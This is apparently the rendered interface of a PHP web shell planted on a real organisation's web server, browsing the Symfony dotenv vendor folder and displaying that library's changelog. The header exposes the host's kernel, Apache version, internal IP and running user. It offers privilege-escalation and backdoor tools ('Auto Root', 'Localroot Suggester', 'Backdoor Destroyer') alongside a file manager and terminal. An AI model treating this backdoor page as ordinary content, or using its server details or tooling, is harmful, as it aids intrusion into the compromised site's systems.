Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
dotenv /
Delete
Unzip
Name
Size
Permission
Date
Action
Command
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
1.37
KB
-rwxrwxr-x
2026-03-30 07:25
Dotenv.php
28.09
KB
-rwxrwxr-x
2026-03-30 07:25
LICENSE
1.04
KB
-rwxrwxr-x
2026-03-30 07:25
README.md
903
B
-rwxrwxr-x
2026-03-30 07:25
composer.json
925
B
-rwxrwxr-x
2026-03-30 07:25
Save
Rename
CHANGELOG ========= 6.2 --- * Add a new `filter` argument to `debug:dotenv` command to filter variable names 5.4 --- * Add `dotenv:dump` command to compile the contents of the .env files into a PHP-optimized file called `.env.local.php` * Add `debug:dotenv` command to list all dotenv files with variables and values * Add `$overrideExistingVars` on `Dotenv::bootEnv()` and `Dotenv::loadEnv()` 5.1.0 ----- * added `Dotenv::bootEnv()` to check for `.env.local.php` before calling `Dotenv::loadEnv()` * added `Dotenv::setProdEnvs()` and `Dotenv::usePutenv()` * made Dotenv's constructor accept `$envKey` and `$debugKey` arguments, to define the name of the env vars that configure the env name and debug settings * deprecated passing `$usePutenv` argument to Dotenv's constructor 5.0.0 ----- * using `putenv()` is disabled by default 4.3.0 ----- * deprecated use of `putenv()` by default. This feature will be opted-in with a constructor argument to `Dotenv` 4.2.0 ----- * added `Dotenv::overload()` and `$overrideExistingVars` as optional parameter of `Dotenv::populate()` * added `Dotenv::loadEnv()` to load a .env file and its corresponding .env.local, .env.$env and .env.$env.local files if they exist 3.3.0 ----- * [BC BREAK] Since v3.3.7, the latest Dotenv files override the previous ones. Real env vars are not affected and are not overridden. * added the component